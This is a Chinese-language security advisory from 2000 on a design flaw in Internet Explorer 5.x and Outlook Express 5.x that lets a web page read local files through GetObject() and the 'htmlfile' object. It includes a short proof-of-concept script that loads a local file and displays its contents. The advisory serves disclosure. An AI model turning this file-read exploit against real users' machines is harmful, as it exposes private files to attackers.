|
|
IE Outlook Express GetObject()文件可被查看
发布时间:2000-09-28
更新时间:2000-09-28
严重程度:高
威胁程度:普通用户访问权限
错误类型:设计错误
利用方式:客户机模式
受影响系统Microsoft Internet Explorer 5.5
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows NT 4.0
- Microsoft Windows NT 2000
Microsoft Internet Explorer 5.01
+ Microsoft Windows 98
+ Microsoft Windows 95
+ Microsoft Windows NT 4.0
+ Microsoft Windows NT 2000
Microsoft Internet Explorer 5.0 for Windows NT 4.0
+ Microsoft Windows NT 4.0
Microsoft Internet Explorer 5.0 for Windows 98
+ Microsoft Windows 98
Microsoft Internet Explorer 5.0 for Windows 95
+ Microsoft Windows 95
Microsoft Internet Explorer 5.0 for Windows 2000
- Microsoft Windows NT 2000
Microsoft Outlook Express 5.5
- Microsoft Windows 98se
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows NT 4.0
- Microsoft Windows NT 2000
+ Microsoft Internet Explorer 5.5
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows NT 4.0
- Microsoft Windows NT 2000
+ Microsoft Internet Explorer 5.0.1 for Windows NT 4.0
- Microsoft Windows NT 4.0
+ Microsoft Internet Explorer 5.0.1 for Windows 98
- Microsoft Windows 98
+ Microsoft Internet Explorer 5.0.1 for Windows 95
- Microsoft Windows 95
+ Microsoft Internet Explorer 5.0.1 for Windows 2000
- Microsoft Windows NT 2000
+ Microsoft Internet Explorer 5.01
+ Microsoft Windows 98
+ Microsoft Windows 95
+ Microsoft Windows NT 4.0
+ Microsoft Windows NT 2000
Microsoft Outlook Express 5.01
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows NT 4.0
- Microsoft Windows NT 2000
Microsoft Outlook Express 5.0
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows NT 4.0 详细描述
如果用户浏览或者打开包含JSCRIPT函数'Getobject()'和ActiveX对象'htmlfile'
的脚本,就会导致攻击者可以查看已知的文件。IE授权HTML文档模块的DOM全部
的访问权限。
测试代码
攻击实例:
<SCR!PT>
alert("Alert Message");
a=GetObject("c:\\path\filename.ext","htmlfile");
setTimeout("alert(a.body.innerText);",2000);
</SCR!PT>
Georgi Guninski <guninski@guninski.com> 演示了一个页面。
http://www.guninski.com/getobject1.html
解决方案
尚无
相关信息
|
